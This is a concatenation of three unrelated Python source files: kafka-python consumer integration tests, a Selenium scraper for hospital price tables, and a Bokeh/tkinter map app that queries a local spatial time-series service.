@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_consumer_topics(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
# Necessary to drive the IO
consumer.poll(500)
assert topic in consumer.topics()
assert len(consumer.partitions_for_topic(topic)) > 0
consumer.close()
@pytest.mark.skipif(env_kafka_version() < (0, 9), reason='Unsupported Kafka Version')
def test_group(kafka_broker, topic):
num_partitions = 4
connect_str = get_connect_str(kafka_broker)
consumers = {}
stop = {}
threads = {}
messages = collections.defaultdict(list)
group_id = 'test-group-' + random_string(6)
def consumer_thread(i):
assert i not in consumers
assert i not in stop
stop[i] = threading.Event()
consumers[i] = KafkaConsumer(topic,
bootstrap_servers=connect_str,
group_id=group_id,
heartbeat_interval_ms=500)
while not stop[i].is_set():
for tp, records in six.itervalues(consumers[i].poll(100)):
messages[i][tp].extend(records)
consumers[i].close()
consumers[i] = None
stop[i] = None
num_consumers = 4
for i in range(num_consumers):
t = threading.Thread(target=consumer_thread, args=(i,))
t.start()
threads[i] = t
try:
timeout = time.time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
logging.info('All consumers have assignment... checking for stable group')
# Verify all consumers are in the same generation
# then log state and break while loop
generations = set([consumer._coordinator._generation.generation_id
for consumer in list(consumers.values())])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and len(generations) == 1:
for c, consumer in list(consumers.items()):
logging.info("[%s] %s %s: %s", c,
consumer._coordinator._generation.generation_id,
consumer._coordinator._generation.member_id,
consumer.assignment())
break
else:
logging.info('Rejoining: %s, generations: %s', rejoining, generations)
time.sleep(1)
assert time.time() < timeout, "timeout waiting for assignments"
logging.info('Group stabilized; verifying assignment')
group_assignment = set()
for c in range(num_consumers):
assert len(consumers[c].assignment()) != 0
assert set.isdisjoint(consumers[c].assignment(), group_assignment)
group_assignment.update(consumers[c].assignment())
assert group_assignment == set([
TopicPartition(topic, partition)
for partition in range(num_partitions)])
logging.info('Assignment looks good!')
finally:
logging.info('Shutting down %s consumers', num_consumers)
for c in range(num_consumers):
logging.info('Stopping consumer %s', c)
stop[c].set()
threads[c].join()
threads[c] = None
@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
topics = [TopicPartition(topic, 1)]
consumer.assign(topics)
assert set(topics) == consumer.assignment()
assert set() == consumer.paused()
consumer.pause(topics[0])
assert set([topics[0]]) == consumer.paused()
consumer.resume(topics[0])
assert set() == consumer.paused()
consumer.unsubscribe()
assert set() == consumer.paused()
consumer.close()
@pytest.mark.skipif(env_kafka_version() < (0, 9), reason='Unsupported Kafka Version')
def test_heartbeat_thread(kafka_broker, topic):
group_id = 'test-group-' + random_string(6)
consumer = KafkaConsumer(topic,
bootstrap_servers=get_connect_str(kafka_broker),
group_id=group_id,
heartbeat_interval_ms=500)
# poll until we have joined group / have assignment
while not consumer.assignment():
consumer.poll(timeout_ms=100)
assert consumer._coordinator.state is MemberState.STABLE
last_poll = consumer._coordinator.heartbeat.last_poll
last_beat = consumer._coordinator.heartbeat.last_send
timeout = time.time() + 30
while True:
if time.time() > timeout:
raise RuntimeError('timeout waiting for heartbeat')
if consumer._coordinator.heartbeat.last_send > last_beat:
break
time.sleep(0.5)
assert consumer._coordinator.heartbeat.last_poll == last_poll
consumer.poll(timeout_ms=100)
assert consumer._coordinator.heartbeat.last_poll > last_poll
consumer.close()
|
browser.py
|
'''
Copyright (c) 2019 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import webbrowser
from time import sleep
import json
import shutil
import re
import sys
import os
class BrowserServer(SimpleHTTPRequestHandler):
'''here we subclass SimpleHTTPServer to capture error messages
'''
def log_message(self, format, *args):
'''log to standard error with a date time string,
and then call any subclass specific logging functions
'''
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
# Workaround for error trying to GET html
if not re.search("div",format%args) and not re.search("function",format%args):
if re.search("404",format%args):
raise IOError(format%args)
def log_error(self, format, *args):
'''log_error
catch errors in the log_messages instead
'''
pass
class BrowserRobot(object):
''' bring up a server with a custom robot
Defaults
==========
pause_time: time to wait between browser commands
port: a random choice between 8000 and 9999
'''
def __init__(self, **kwargs):
self.Handler = BrowserServer
if "port" in kwargs:
self.port = kwargs['port']
else:
self.port = choice(range(8000,9999))
print('Selected port is %s' %self.port)
self.httpd = TCPServer(("", self.port), self.Handler)
self.server = Thread(target=self.httpd.serve_forever)
self.server.setDaemon(True)
self.server.start()
self.started = True
self.pause_time = 100
self.browser = None
self.headless = False
self.display = None
self.driver = "Chrome"
if "browser" in kwargs:
self.driver = kwargs['browser']
def get_and_wait(self, url, sleep_seconds=0):
'''a helper function to get a browser and wait a randomly
selected number of seconds between 0 and 2'''
self.get_browser()
wait_time = choice([0, 0.25, 0.5, 0.75, 1, 1.5, 2])
self.browser.implicitly_wait(wait_time) # if error, will wait 3 seconds and retry
self.browser.set_page_load_timeout(10)
self.get_page(url)
sleep(sleep_seconds)
def get_browser(self, name=None):
'''get_browser
return a browser if it hasn't been initialized yet
'''
if name is None:
name=self.driver
log_path = "%s-driver.log" % name.lower()
if self.browser is None:
options = self.get_options()
if name.lower() == "Firefox":
self.browser = webdriver.Firefox(service_log_path=log_path)
else:
self.browser = webdriver.Chrome(service_log_path=log_path,
options=options)
return self.browser
def get_options(self, width=1200, height=800):
'''return options for headless, no-sandbox, and custom width/height
'''
options = webdriver.ChromeOptions()
options.add_argument("headless")
options.add_argument("no-sandbox")
options.add_argument("window-size=%sx%s" %(width, height))
return options
def get_page(self, url, name='Chrome'):
'''get_page
open a particular url, checking for Timeout
'''
if self.browser is None:
self.browser = self.get_browser(name)
try:
return self.browser.get(url)
except TimeoutException:
print('Browser request timeout. Are you connected to the internet?')
self.browser.close()
sys.exit(1)
def stop(self):
'''close any running browser or server, and shut down the robot
'''
if self.browser is not None:
self.browser.close()
self.httpd.server_close()
if self.display is not None:
self.display.close()
def run_javascript(browser,code):
if self.browser is not None:
return browser.execute_script(code)
class ScraperRobot(BrowserRobot):
def __str__(self):
return "[browser-robot]"
def __repr__(self):
return "[browser-robot]"
def get_download_urls(self, url):
'''download paginated charge sheets
Parameters
==========
uri: the Docker Hub uri to parse.
'''
self.get_and_wait(url)
javascript = 'return document.getElementsByTagName("a")'
result = self.browser.execute_script(javascript)
for link in result:
if link.text == "All":
break
# Show all tables with prices
link.click()
# Get tables
javascript = 'return document.getElementsByTagName("tbody")'
tables = self.browser.execute_script(javascript)
entries = [['service', 'price', 'hospital_stay_range']]
for table in tables:
rows = table.find_elements_by_tag_name('tr')
for row in rows:
cols = row.find_elements_by_tag_name('td')
entries.append([c.text for c in cols])
return entries
|
main.py
|
from __future__ import print_function
from bokeh.plotting import figure, curdoc
from bokeh.tile_providers import STAMEN_TERRAIN_RETINA, get_provider
from bokeh.models import ColumnDataSource, WheelZoomTool, Band, Button, LabelSet, Dropdown, TapTool, Quad
from bokeh.layouts import column, row
from bokeh.events import ButtonClick, Tap
import pandas as pd
from io import StringIO
import numpy as np
import json
import requests
from shapely import wkt
import geopandas
from colour import Color
from pyproj import Transformer
from types import FunctionType
from copy import copy
import tkinter as tk
from tkinter import ttk, StringVar
from tkinter.filedialog import askopenfilename
import tkinter.simpledialog
from tkinter import Toplevel, Label
import threading
import time
####################################################################################
################################# GLOBAL VARIABLES #################################
####################################################################################
service_url = 'http://localhost:8080/'
query_url = service_url + 'runQuery'
build_index_url = service_url + 'buildIndex'
get_rootMBR_url = service_url + 'getRootMBR'
default_selected_bundle = 0
max_k1 = 26
max_bundles = 10
default_k1 = 5
default_k2 = 5
initial_query_x1 = -18823760.30596319
initial_query_x2 = 21410224.676255226
initial_query_y1 = -8443745.818059208
initial_query_y2 = 19211608.358907666
default_query_x1 = -18823760.30596319
default_query_x2 = 21410224.676255226
default_query_y1 = -8443745.818059208
default_query_y2 = 19211608.358907666
default_scale = 15000
query_x1 = 0
query_x2 = 0
query_y1 = 0
query_y2 = 0
geoms = 0
bundles = 0
window = None
message = None
response = None
filename = None
cancelled = True
local_entry = None
remote_entry = None
####################################################################################
####################################################################################
####################################################################################
##################################### CLASSES ######################################
####################################################################################
class show_message(Toplevel):
def __init__(self, master, positionRight, positionDown):
Toplevel.__init__(self, master)
master.withdraw()
self.title("Loading...")
label = tk.Label(self, text="Please Wait...")
label.pack(side="top", fill="both", expand=True, padx=30, pady=20)
self.geometry("+{}+{}".format(positionRight+500, positionDown))
self.lift()
self.attributes('-topmost',True)
self.after_idle(self.attributes, '-topmost',False)
class GUI_local:
def __init__(self, window):
global input_text1, input_text2, filename, cancelled, local_entry, remote_entry
cancelled = True
self.path = ''
window.title("Open Dataset...")
window.resizable(0, 0) # this prevents from resizing the window
window.geometry("763x35")
local_entry = ttk.Entry(window, width = 70)
local_entry.grid(row = 0, column = 0, ipadx=5, ipady=4)
ttk.Button(window, text = "Browse", command = lambda: self.set_path_local_field()).grid(row = 0, column=1, ipadx=5, ipady=5)
local = ttk.Button(window, text = "OK", command = lambda: self.get_filepath()).grid(row = 0, column=2, ipadx=5, ipady=5)
def set_path_local_field(self):
global local_entry, window, input_text1
self.path = askopenfilename(filetypes=[("CSV files", ".csv")], parent=window)
local_entry.delete(0, "end")
local_entry.insert(0, self.path)
def get_filepath(self):
global window, filename, cancelled, local_entry
cancelled = False
filename = local_entry.get()
window.destroy()
class GUI_remote:
def __init__(self, window):
global input_text1, input_text2, filename, cancelled, local_entry, remote_entry
cancelled = True
self.path = ''
window.title("Open Dataset...")
window.resizable(0, 0) # this prevents from resizing the window
window.geometry("673x35")
remote_entry = ttk.Entry(window, width = 70)
remote_entry.grid(row = 0, column = 0, ipadx=5, ipady=4)
remote = ttk.Button(window, text = "OK", command = lambda: self.get_filepath()).grid(row = 0, column=1, ipadx=5, ipady=5)
def get_filepath(self):
global window, filename, cancelled, remote_entry
cancelled = False
filename = remote_entry.get()
window.destroy()
####################################################################################
#################################### FUNCTIONS #####################################
####################################################################################
def get_scale():
global query_x1, query_x2
x_range = default_query_x2-default_query_x1
new_x_range = query_x2-query_x1
new_scale = (new_x_range * default_scale) / x_range
return new_scale
def get_query_from_scale(new_scale):
global default_query_x1, default_query_x2, default_query_y1, default_query_y2
x_range = abs(default_query_x2-default_query_x1)
new_x_range = (x_range * new_scale) / default_scale
diff_x = abs(x_range - new_x_range)
if new_x_range > x_range:
new_query_x1 = default_query_x1 - (diff_x/2)
new_query_x2 = default_query_x2 + (diff_x/2)
else:
new_query_x1 = default_query_x1 + (diff_x/2)
new_query_x2 = default_query_x2 - (diff_x/2)
y_range = abs(default_query_y2-default_query_y1)
new_y_range = (y_range * new_scale) / default_scale
diff_y = abs(y_range - new_y_range)
if new_y_range > y_range:
new_query_y1 = default_query_y1 - (diff_y/2)
new_query_y2 = default_query_y2 + (diff_y/2)
else:
new_query_y1 = default_query_y1 + (diff_y/2)
new_query_y2 = default_query_y2 - (diff_y/2)
return new_query_x1, new_query_x2, new_query_y1, new_query_y2
def lon_to_web_mercator(lon):
k = 6378137
return lon * (k * np.pi / 180.0)
def lat_to_web_mercator(lat):
k = 6378137
return np.log(np.tan((90 + lat) * np.pi / 360.0)) * k
def wgs84_to_web_mercator(df, lon="lon", lat="lat"):
"""Converts decimal longitude/latitude to Web Mercator format"""
k = 6378137
df["x"] = df[lon] * (k * np.pi / 180.0)
df["y"] = np.log(np.tan((90 + df[lat]) * np.pi / 360.0)) * k
return df
def epsg3627_to_web_mercrator(coords):
transformer = Transformer.from_crs("epsg:3627", "epsg:4326")
x1, y1 = coords[0], coords[1]
x2, y2, = transformer.transform(x1, y1)
x2 = lat_to_web_mercator(x2)
y2 = lon_to_web_mercator(y2)
return (y2, x2)
def get_spatial_data(selected_bundle):
global geoms, bundles, default_k1
centroidsX = []
centroidsY = []
areas = []
cols = []
counts = []
geometries = []
top = []
bottom = []
left = []
right = []
selected_geoms = geoms.loc[geoms['bundle'] == selected_bundle].reset_index(drop=True)
for i in list(range(0, len(selected_geoms['geometries']))):
X = lon_to_web_mercator(selected_geoms['geometries'][i].centroid.coords[0][0])
Y = lat_to_web_mercator(selected_geoms['geometries'][i].centroid.coords[0][1])
if (X not in centroidsX) and (Y not in centroidsY):
centroidsX.append(X)
centroidsY.append(Y)
geometries.append(selected_geoms['geometries'][i].bounds)
top_coord = lat_to_web_mercator(selected_geoms['geometries'][i].bounds[3])
bottom_coord = lat_to_web_mercator(selected_geoms['geometries'][i].bounds[1])
left_coord = lon_to_web_mercator(selected_geoms['geometries'][i].bounds[0])
right_coord = lon_to_web_mercator(selected_geoms['geometries'][i].bounds[2])
if (top_coord == bottom_coord and left_coord == right_coord):
top_coord += 10
bottom_coord -= 10
left_coord -= 10
right_coord += 10
elif (top_coord - bottom_coord < 5):
top_coord += 50
bottom_coord -= 50
elif (left_coord - right_coord < 5):
left_coord -= 50
right_coord += 50
top.append(top_coord)
bottom.append(bottom_coord)
left.append(left_coord)
right.append(right_coord)
else:
continue
counts.append(" " + str(selected_geoms['count'][i]) + " ")
areas.append(selected_geoms['geometries'][i].area)
multiplier = 200
try:
areas = [multiplier*(x / max(areas)) for x in areas]
except:
areas = [100]
default_k1 = len(geoms)
noOfTSsummaries.label = str(default_k1) + " bundles"
# Generate the colors
red = Color("green")
colors = list(red.range_to(Color("red"), len(areas)+1))
cols = []
for j in range(len(areas)):
col = (float(counts[j])/areas[j])*((len(areas))/500)*100
if col > len(areas):
col = len(areas)
cols.append(str(colors[int(col)]))
return counts, centroidsY, centroidsX, areas, cols, geometries, top, bottom, left, right
def createFunc(i):
def callback(but):
global default_selected_bundle
for b in buttons:
b.css_classes =['custom_button']
but.css_classes = ['custom_button_selected']
bundle = int(but.label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
return callback
############################
#### CALLBACK FUNCTIONS ####
############################
def fecth_data():
global default_k1, default_selected_bundle
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
for i in list(range(0, max_k1)):
mbrs = curdoc().select_one({'name' : str(i)})
labels = curdoc().select_one({'name' : "label " + str(i)})
if i==0:
mbrs.visible = True
labels.visible = True
else:
mbrs.visible = False
labels.visible = False
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
bundle = int(buttons[0].label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
update_plot()
def update_plot():
# Create the query
global query_x1, query_x2, query_y1, query_y2, service_url, query_url, default_k1, max_bundles
transformer = Transformer.from_crs("epsg:3857", "epsg:3627")
qx1, qy1 = transformer.transform(query_x1+150, query_y1+150)
qx2, qy2 = transformer.transform(query_x2-150, query_y2-150)
# Get the data from the server via REST API
global geoms, bundles
config = dict()
config['x1'] = str(qx1)
config['x2'] = str(qx2)
config['y1'] = str(qy1)
config['y2'] = str(qy2)
config['k1'] = str(default_k1)
config['k2'] = str(default_k2)
config = json.dumps(config)
config = json.loads(config)
r = requests.post(query_url, json=config)
response = r.json()
geoms = pd.read_csv(StringIO(response["content"][0]), header=0, delimiter='|')
bundles = pd.read_csv(StringIO(response["content"][1]), header=0, delimiter=';')
# Update map summaries
my_df = []
for i in list(range(0, len(geoms['wkt']))):
d = {
'bundle' : geoms['bundle'][i],
'count' : geoms['count'][i],
'geometries' : geoms['wkt'][i]
}
my_df.append(d)
geoms = pd.DataFrame(my_df)
if len(geoms) > 0:
geoms['geometries'] = geoms['geometries'].apply(wkt.loads)
geoms = geopandas.GeoDataFrame(geoms, geometry='geometries')
geoms.crs = "EPSG:3627"
geoms = geoms.to_crs(crs="EPSG:4326")
# Update time series summaries
if len(geoms) > 0: # if we have obtained some results, continue normally
for i in list(range(0, len(bundles))):
counts, centroidsY, centroidsX, areas, cols, geometries, top, bottom, left, right = get_spatial_data(i)
fill_alpha = []
line_alpha = []
if len(geoms) == len(bundles) and len(bundles) > max_bundles:
counts = []
cols = []
for j in range(len(areas)):
fill_alpha.append(1)
line_alpha.append(1)
cols.append("blue")
counts.append("")
else:
for j in range(len(counts)):
fill_alpha.append(0.25)
line_alpha.append(0.75)
new_data=dict(counts=counts,
lat=centroidsY,
lon=centroidsX,
size=areas,
fill_alpha=fill_alpha,
line_alpha=line_alpha,
colors=cols,
geometries=geometries,
top=top,
bottom=bottom,
left=left,
right=right)
sourcesMap[i].data = new_data
counts = new_data['counts']
upper = [float(i) for i in bundles['UPPER_BOUND'][i].split(",")]
lower = [float(i) for i in bundles['LOW_BOUND'][i].split(",")]
average = [(g + h) / 2 for g, h in zip(upper, lower)]
new_data=dict(upper=upper,
lower=lower,
average=average,
timestamps=list(range(0, len(bundles['UPPER_BOUND'][0].split(",")))))
sourcesBundles[i].data = new_data
if (upper[0] < float(-1000000000) or lower[0] > float(1000000000)):
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
elif len(counts) == 0:
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
else:
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = True
else: # if results are empty, just plot nothing
for i in list(range(0, default_k1)):
new_data=dict(counts=[],
lat=[],
lon=[],
size=[],
colors=[],
geometries=[])
sourcesMap[i].data = new_data
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(20)})
ts_plot.visible = True
for i in list(range(default_k1, max_k1)):
ts_plot = ts_plots.select_one({'name' : "ts_plot " + str(i)})
ts_plot.visible = False
# Update the scale button
new_scale = get_scale()
scaleSelect.label = "Scale 1:" + str(int(new_scale))
# Other callbacks
def selected_k1(event):
global default_k1
default_k1 = int(event.item)
noOfTSsummaries.label = str(default_k1) + " bundles"
update_plot()
def selected_scale(event):
new_scale = int(event.item.split(":")[1])
new_query_x1, new_query_x2, new_query_y1, new_query_y2 = get_query_from_scale(new_scale)
map = curdoc().select_one({'name' : "map"})
map.x_range.start = new_query_x1
map.x_range.end = new_query_x2
map.y_range.start = new_query_y1
map.y_range.end = new_query_y2
global query_x1, query_x2, query_y1, query_y2
query_x1 = new_query_x1
query_x2 = new_query_x2
query_y1 = new_query_y1
query_y2 = new_query_y2
global default_k1, default_selected_bundle
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
for i in list(range(0, max_k1)):
mbrs = curdoc().select_one({'name' : str(i)})
labels = curdoc().select_one({'name' : "label " + str(i)})
if i==0:
mbrs.visible = True
labels.visible = True
else:
mbrs.visible = False
labels.visible = False
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
bundle = int(buttons[0].label)-1
prev = p.select_one({'name' : str(default_selected_bundle)})
prev_labels = p.select_one({'name' : "label " + str(default_selected_bundle)})
prev.visible = False
prev_labels.visible = False
curr = p.select_one({'name' : str(bundle)})
curr_labels = p.select_one({'name' : "label " + str(bundle)})
curr.visible = True
curr_labels.visible = True
default_selected_bundle = bundle
update_plot()
def threaded_function():
global message, window, response
config = dict()
config['filename'] = filename
config = json.dumps(config)
config = json.loads(config)
r = requests.post(build_index_url, json=config)
response = r.json()
message.destroy()
window.destroy()
def selected_dataset(event):
global query_x1, query_x2, query_y1, query_y2, default_query_x1, default_query_x2, default_query_y1, default_query_y2, window, message, filename, response, build_index_url, cancelled
window = tkinter.Tk()
if event.item == "Open Local":
gui = GUI_local(window)
windowWidth = 763
windowHeight = 55
else:
gui = GUI_remote(window)
windowWidth = 673
windowHeight = 55
positionRight = int(window.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(window.winfo_screenheight()/2 - windowHeight/2)
window.geometry("+{}+{}".format(positionRight, positionDown))
window.lift()
window.attributes('-topmost',True)
window.after_idle(window.attributes,'-topmost',False)
window.focus_force()
window.mainloop()
if cancelled == False:
window = tkinter.Tk()
message = show_message(window, positionRight, positionDown)
thread = threading.Thread(target = threaded_function)
thread.setDaemon(True)
thread.start()
message.mainloop()
r = requests.post(get_rootMBR_url)
response = r.json()
c_query_x1 = float(response['content'][0])
c_query_x2 = float(response['content'][0]) + float(response['content'][2])
c_query_y1 = float(response['content'][1])
c_query_y2 = float(response['content'][1]) + float(response['content'][3])
transformer = Transformer.from_crs("epsg:3627", "epsg:3857")
c_query_x1, c_query_y1 = transformer.transform(c_query_x1+150, c_query_y1+150)
c_query_x2, c_query_y2 = transformer.transform(c_query_x2-150, c_query_y2-150)
map = curdoc().select_one({'name' : "map"})
c_x_diff = c_query_x2 - c_query_x1
c_y_diff = c_query_y2 - c_query_y1
x_diff = map.x_range.end - map.x_range.start
y_diff = map.y_range.end - map.y_range.start
if c_x_diff > c_y_diff:
scale_f = x_diff/y_diff
new_c_y_diff = c_x_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x2
map.y_range.start = c_query_y1
map.y_range.end = c_query_y1 + new_c_y_diff
default_query_x1 = query_x1 = c_query_x1
default_query_x2 = query_x2 = c_query_x2
default_query_y1 = query_y1 = c_query_y1
default_query_y2 = query_y2 = c_query_y1 + new_c_y_diff
update_plot()
else:
scale_f = y_diff/x_diff
new_c_x_diff = c_y_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x1 + new_c_x_diff
map.y_range.start = c_query_y1
map.y_range.end = c_query_y2
default_query_x1 = query_x1 = c_query_x1
default_query_x2 = query_x2 = c_query_x1 + new_c_x_diff
default_query_y1 = query_y1 = c_query_y1
default_query_y2 = query_y2 = c_query_y2
update_plot()
def reset_plot(event):
global query_x1, query_x2, query_y1, query_y2, default_k1
map = curdoc().select_one({'name' : "map"})
map.x_range.start = default_query_x1
map.x_range.end = default_query_x2
map.y_range.start = default_query_y1
map.y_range.end = default_query_y2
default_k1 = 5
noOfTSsummaries.label = str(default_k1) + " bundles"
query_x1 = default_query_x1
query_x2 = default_query_x2
query_y1 = default_query_y1
query_y2 = default_query_y2
for b in buttons:
b.css_classes=['custom_button']
buttons[0].css_classes=['custom_button_selected']
update_plot()
def getCallback(calls, i):
return lambda: calls[i](buttons[i])
def update1(attr,new,old):
global query_x1
query_x1 = new
def update2(attr,new,old):
global query_x2
query_x2 = new
def update3(attr,new,old):
global query_y1
query_y1 = new
def update4(attr,new,old):
global query_y2
query_y2 = new
def selected_circle(event):
global query_x1, query_x2, query_y1, query_y2
coords = sourcesMap[default_selected_bundle].data['geometries'][sourcesMap[default_selected_bundle].selected.indices[0]]
c_query_x1 = lon_to_web_mercator(coords[0])
c_query_x2 = lon_to_web_mercator(coords[2])
c_query_y1 = lat_to_web_mercator(coords[1])
c_query_y2 = lat_to_web_mercator(coords[3])
map = curdoc().select_one({'name' : "map"})
c_x_diff = c_query_x2 - c_query_x1
c_y_diff = c_query_y2 - c_query_y1
x_diff = query_x2 - query_x1
y_diff = query_y2 - query_y1
if c_x_diff > c_y_diff:
scale_f = x_diff/y_diff
new_c_y_diff = c_x_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x2
map.y_range.start = c_query_y1
map.y_range.end = c_query_y1 + new_c_y_diff
query_x1 = c_query_x1
query_x2 = c_query_x2
query_y1 = c_query_y1
query_y2 = c_query_y1 + new_c_y_diff
update_plot()
else:
scale_f = y_diff/x_diff
new_c_x_diff = c_y_diff/scale_f
map.x_range.start = c_query_x1
map.x_range.end = c_query_x1 + new_c_x_diff
map.y_range.start = c_query_y1
map.y_range.end = c_query_y2
query_x1 = c_query_x1
query_x2 = c_query_x1 + new_c_x_diff
query_y1 = c_query_y1
query_y2 = c_query_y2
update_plot()
####################################################################################
####################################################################################
####################################################################################
########################## VISUALIZATION INITIALIZATION ############################
####################################################################################
# Create the map plot for the default scale
tile_provider = get_provider(STAMEN_TERRAIN_RETINA)
globe = x_range, y_range = ((initial_query_x1, initial_query_x2), (initial_query_y1, initial_query_y2))
p = figure(x_range=x_range, y_range=y_range, x_axis_type="mercator", y_axis_type="mercator", name="map", tools="tap, pan, wheel_zoom")
p.on_event(Tap, selected_circle)
p.x_range.on_change('start', update1)
p.x_range.on_change('end', update2)
p.y_range.on_change('start', update3)
p.y_range.on_change('end', update4)
p.sizing_mode = 'stretch_both'
p.add_tile(tile_provider)
p.xaxis.visible = False
p.yaxis.visible = False
p.toolbar.active_scroll = p.select_one(WheelZoomTool)
p.toolbar_location = None
# Create the time series plots for the default map scale
ts_plots = []
buttons = []
sourcesMap = []
sourcesBundles = []
ts_plot_height = 200
for i in list(range(0, max_k1)):
source = ColumnDataSource(
data=dict(counts=[],
lat=[],
lon=[],
size=[],
colors=[],
fill_alpha=[],
line_alpha=[],
geometries=[],
top=[],
bottom=[],
left=[],
right=[])
)
sourcesMap.append(source)
c = p.quad(top="top", bottom="bottom", left="left", right="right", fill_color="colors", fill_alpha="fill_alpha", line_alpha="line_alpha", line_color="colors", line_width=4, source=source, name=str(i))
glyph = Quad(fill_color="colors", fill_alpha="fill_alpha", line_alpha="line_alpha", line_color="colors", line_width=4)
c.selection_glyph = glyph
c.nonselection_glyph = glyph
labels = LabelSet(x='lon', y='lat', text_font='helvetica', text='counts', text_font_size='20px', text_font_style='bold', text_align='center', text_baseline='middle', text_color='white', background_fill_color='colors', level='overlay', x_offset=-7, y_offset=-7, source=source, render_mode='canvas', name="label " + str(i))
p.add_layout(labels)
if i==0:
c.visible = True
labels.visible = True
else:
c.visible = False
labels.visible = False
source = ColumnDataSource(
data=dict(upper=[],
lower=[],
average=[],
timestamps=[])
)
sourcesBundles.append(source)
s = figure(background_fill_color="#fafafa", name="fig " + str(i))
s.toolbar_location = None
s.line(x="timestamps", y="upper", color="#53777a", line_width=3, source=source, alpha=0.3)
s.line(x="timestamps", y="lower", color="#53777a", line_width=3, source=source, alpha=0.3)
s.line(x="timestamps", y="average", color="#53777a", line_width=2, source=source)
band = Band(base="timestamps", upper='upper', lower='lower', source=source, level='underlay', fill_alpha=0.2, fill_color='#53777a')
s.add_layout(band)
buttons.append(Button(label=str(i+1), css_classes=['custom_button'], name="button " + str(i), sizing_mode = 'stretch_height'))
s.height = ts_plot_height
s.sizing_mode = 'stretch_width'
button_row = row(buttons[i])
button_row.width = 44
button_row.height = ts_plot_height - 20
layout = row(button_row, s, name="ts_plot " + str(i))
layout.sizing_mode = 'stretch_both'
ts_plots.append(layout)
##################################################################
##################################################################
# Add all extra cuntionality buttons and define their callbacks
fetchButton = Button(label="Fetch", css_classes=['custom_button_fetch'])
fetchButton.on_event(ButtonClick, fecth_data)
resetButton = Button(label="Reset", css_classes=['custom_button_reset'])
resetButton.on_event(ButtonClick, reset_plot)
menuTSsummaries = [("1", "1"), ("2", "2"), ("3", "3"), ("4", "4"), ("5", "5"), ("6", "6"), ("7", "7"), ("8", "8"), ("9", "9"), ("10", "10")]
noOfTSsummaries = Dropdown(css_classes=['custom_button'], menu=menuTSsummaries)
noOfTSsummaries.label = str(default_k1) + " bundles"
noOfTSsummaries.on_click(selected_k1)
selectDataset = [("Open Local", "Open Local"), ("Open Remote", "Open Remote")]
selectDatasetDropdown = Dropdown(label="Open Dataset", css_classes=['custom_button'], menu=selectDataset)
selectDatasetDropdown.on_click(selected_dataset)
menuScale = [("1:500", "Scale 1:500"), ("1:5000", "Scale 1:5000"), ("1:10000", "Scale 1:10000"), ("1:15000", "Scale 1:15000"), ("1:20000", "Scale 1:20000"), ("1:25000", "Scale 1:25000")]
scaleSelect = Dropdown(css_classes=['custom_button'], menu=menuScale)
scaleSelect.on_click(selected_scale)
callbacks = [createFunc(i) for i in range(max_k1)]
for i in range(max_k1):
buttons[i].on_click(getCallback(callbacks, i))
buttons[0].css_classes = ['custom_button_selected']
# Add everything to layouts and to the final application
ts_plots = column(ts_plots)
ts_plots.sizing_mode = 'stretch_both'
func_buttons = row(fetchButton, resetButton, selectDatasetDropdown, noOfTSsummaries, scaleSelect)
